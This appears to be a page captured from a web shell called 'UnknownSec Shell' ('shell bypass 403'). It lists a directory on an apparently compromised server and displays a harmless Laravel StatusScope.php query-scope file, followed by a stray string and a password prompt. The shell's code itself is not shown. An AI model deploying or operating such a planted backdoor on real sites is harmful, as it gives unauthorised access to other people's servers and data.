shell bypass 403

UnknownSec Shell

: /home/bouloter/sms/app/Scopes/ [ drwxr-xr-x ]

name : StatusScope.php
<?php

namespace App\Scopes;

use Illuminate\Database\Eloquent\Builder;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Scope;

class StatusScope implements Scope
{
    /**
     * Apply the scope to a given Eloquent query builder.
     *
     * @param Builder $builder
     * @param Model   $model
     * @return void
     */
    public function apply(Builder $builder, Model $model)
    {
        $builder->where('status', true);
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password